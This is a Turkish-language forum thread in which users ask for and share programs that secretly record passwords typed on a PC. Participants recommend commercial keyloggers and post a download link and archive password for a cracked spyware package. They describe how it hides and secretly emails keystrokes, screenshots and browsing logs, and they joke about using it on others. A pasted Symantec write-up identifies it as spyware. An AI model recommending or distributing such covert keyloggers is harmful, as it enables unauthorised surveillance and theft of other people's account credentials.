Orijinalini görmek için tıklayınız : şifre kaydetme
focus musty35
25-06-2011, 00:01
arkadaşlar pc den girilen msn facebook şifresi gıbı şifrelerı kayıt eden program arıyorum önceden klavyeden basılan her tuşu kaydeden bır progrm vardı ama bulamadım google arattıgım cıkan linklerın cou kırık program ısmı verebılcek yada link verebilcek varmı ?
keylogger mı
evet kel goyverir :D
Refog Personel Monitor cok güzel tavsiye ederim
evet kel goyverir :D
yaşıomusun la sen .
focus musty35
25-06-2011, 00:11
keylogger ı kurdum tesekkur ederım :)
focus musty35
25-06-2011, 00:14
keylogger ı ctrl alt f7 le actım kapattıktn sonra acılmıo yıne :D
focus musty35
25-06-2011, 00:36
Abi hayırdır :D
yaa öle bi şiflere kaybolmasın kalpler kırılmasın :D
yaa öle bi şiflere kaybolmasın kalpler kırılmasın :D
Niyetimiz hep iyi :D:D:D:D:D
yaşıomusun la sen .
yaşamaya çalışıyoruz panpa :D sen ne örün
bu işler için en iyi programlardan biri ;) herbişeyi yapıyor :D
içindeki txt dosyasında nasil kullanılacağı yazıyor. full versiyon.
ÖZELLIKLERI NELERDIR?
1.Klavye kaydedici özelligi ile bilgisayarda yazilan herseyi kaydeder.Örnegin msn sohbeti , e-mailler , word dosyalari, şifreler gibi.
2.Internette girilen ve gezilen bütün web sitelerini kaydeder ve listeler.
3.Sizin belirleyeceginiz araliklarla bilgisayarinizin ekranini kaydeder.Bu sanki belli araliklarla bilgisayarin ekraninin fotografinin çekilmesi gibidir.
4.Bilgisayarinizda açilan veya çalistirilan bütün dosyalari kaydeder ve listeler.
5.Bilgisayarinizda açilan veya silinen bütün dosyalari kaydeder ve listeler.
6.Bütün bu bilgileri sizin belirleyeceginiz araliklarla e-mail adresinize gizlice gönderir.
7. bla bla bla bu niyette yapılacak herşeyi yapıyor işte
(pm)
rar şifresi: tt
tt üyelerine özel :D vermem yoksa ole herkese kolay kolay
Keylogger baska birsey
Sifreleri kriptolanmis saklamak icin
Keepass yada password safe kullanabilirsin
ÖZELLIKLERI NELERDIR?
1.Klavye kaydedici özelligi ile bilgisayarda yazilan herseyi kaydeder.Örnegin msn sohbeti , e-mailler , word dosyalari, şifreler gibi.
3.Sizin belirleyeceginiz araliklarla bilgisayarinizin ekranini kaydeder.Bu sanki belli araliklarla bilgisayarin ekraninin fotografinin çekilmesi gibidir.
4.Bilgisayarinizda açilan veya çalistirilan bütün dosyalari kaydeder ve listeler.
6.Bütün bu bilgileri sizin belirleyeceginiz araliklarla e-mail adresinize gizlice gönderir.
http://www.filedropper.com/spyv387eticon
saol....:D
saol....:D
bişi değil, faydalı olduysa ne mutlu ;)
ÖZELLIKLERI NELERDIR?
çok iyi bişeymiş bu ya teşekkürler :D
sizin için upload ettim nete :D nedemek güle güle kullanın :D
63owen63
25-06-2011, 13:54
ÖZELLIKLERI NELERDIR?
win7 enterprise kullanıyorum önce yüklerken biri iki hata verdi system32 ye bi kaç dosya indirip ekledim,
comctl.32 öyle bi dosya eksik diyordu kurarken, indirdim, var olmasına ragmen hatta degiştirdim yeni indirdigimi, neyse kuruldu, fakat şuan programı açamıyorum ctrl- alt f7 yapıyorum açılmıyor, run as administrator yapıyorum bu sefer yine comctl.32 ile başlayan hatayı veriyor
daha sonra yüklemeyi yaptım,
ProdriveSTI
25-06-2011, 16:00
#12 Eyvallah,sağolasın :)
ÖZELLIKLERI NELERDIR?
Symantec Protection Suite - Enterprise Edition kullanıyorum. Dosyayı download ettiğim an uyarı verdi ve önce karantinaya aldı sonrasında da sildi.
Updated: February 13, 2007 11:39:11 **
Type: Spyware
Version: 3.03
Publisher: @ Spy Software
Risk Impact: High
File Names: Ssmgr.exe,svchost.exe,007install.exe
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP Behavior
Spyware.007Spy is a commercial spyware program that logs keystrokes, Web sites visited, programs used, and files and folder activity. It also has the ability to capture screenshots and can use FTP or email to send all the logs to a remote server or email address.
This spyware can be run automatically in a silent, undetectable mode and it cannot be accessed until it is brought out of silent mode. This can be done with a hot-key combination (the default combination is Ctrl+Alt+7).
Symptoms
The files are detected as Spyware.007Spy.
Transmission
This spyware must be manually installed.
Antivirus Protection DatesInitial Rapid Release version September 3, 2004
Latest Rapid Release version June 23, 2011 revision 040
Initial Daily Certified version September 3, 2004
Latest Daily Certified version June 24, 2011 revision 002
Initial Weekly Certified release date September 8, 2004
http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2004-083015-5835-99&vid=4294906021
Symantec Protection Suite - Enterprise Edition kullanıyorum. Dosyayı download ettiğim an uyarı verdi ve önce karantinaya aldı sonrasında da sildi.
Updated: February 13, 2007 11:39:11 **
Type: Spyware
Version: 3.03
Publisher: @ Spy Software
Risk Impact: High
File Names: Ssmgr.exe,svchost.exe,007install.exe
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP Behavior
Spyware.007Spy is a commercial spyware program that logs keystrokes, Web sites visited, programs used, and files and folder activity. It also has the ability to capture screenshots and can use FTP or email to send all the logs to a remote server or email address.
This spyware can be run automatically in a silent, undetectable mode and it cannot be accessed until it is brought out of silent mode. This can be done with a hot-key combination (the default combination is Ctrl+Alt+7).
Symptoms
The files are detected as Spyware.007Spy.
Transmission
This spyware must be manually installed.
Antivirus Protection DatesInitial Rapid Release version September 3, 2004
Latest Rapid Release version June 23, 2011 revision 040
Initial Daily Certified version September 3, 2004
Latest Daily Certified version June 24, 2011 revision 002
Initial Weekly Certified release date September 8, 2004
Spyware.007Spy | Symantec (http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2004-083015-5835-99&vid=4294906021)
çok normal tabiki silicek. keylogger var içinde çünkü. yüklediğin bilgisayarda veyahut kendi bilgisayarında başkalarının haberi olmadan yazdıklarını gördüklerini kaydediyor. ama bunun kontrolu sende. doğal olarak antivirüs bu işleri yaptığı için programın kod larından algılayıp zararlı diyor.
ha bu arada gizliden size mail gönderdiğinden, ftp ye dosya yüklediğindende yakalanması doğal.
şimdi bu kısmını hiç düşünmemiştim. ben yanlış anlaşılabilirim burada. gerçi ben klavye arkasından yeri yurdu belli olmayan biri değilim ama olsun. zaman kotu kimse kimseye güvenemiyor istemeden güvensizlik vermiş olabilirim linki kaldırıyorum.
ihtiyaçı olana özel olarak gönderirim.
win7 enterprise kullanıyorum önce yüklerken biri iki hata verdi system32 ye bi kaç dosya indirip ekledim,
comctl.32 öyle bi dosya eksik diyordu kurarken, indirdim, var olmasına ragmen hatta degiştirdim yeni indirdigimi, neyse kuruldu, fakat şuan programı açamıyorum ctrl- alt f7 yapıyorum açılmıyor, run as administrator yapıyorum bu sefer yine comctl.32 ile başlayan hatayı veriyor
daha sonra yüklemeyi yaptım,
ben xp de kulanmıştım en son win7 de hiç yüklemedım. kendi bilgisayarıma gittiğim zaman bakıcam win7 de çalışıp çalışmadığına.
ProdriveSTI
25-06-2011, 19:13
Linki kaldırmana gerek yoktu,alıntı yapılan yorumlarda link var zaten,alan ordan da alır...
63owen63
24-02-2013, 13:10
Gönül rahatlıgı ile kullanılabilecek keylogger yada girilen şifreleri otomatik kaydeden bir program var mıdır gerçekten de ?
musti başkan niyeti bozdun galiba :D
Zamanında ''msn pass vol'' vardı :) Neden ihtiyaç duydumu bilmiyorum :)
Gönül rahatlıgı ile kullanılabilecek keylogger yada girilen şifreleri otomatik kaydeden bir program var mıdır gerçekten de ?
İlk sayfada bir link var abi, denedin mi?
63owen63
24-02-2013, 23:12
ilk sayfadakini vaktinde denemiştim,sonuc alamamıştım :)
keylogger ın iphone için olanı varmı yada onun gibi bişi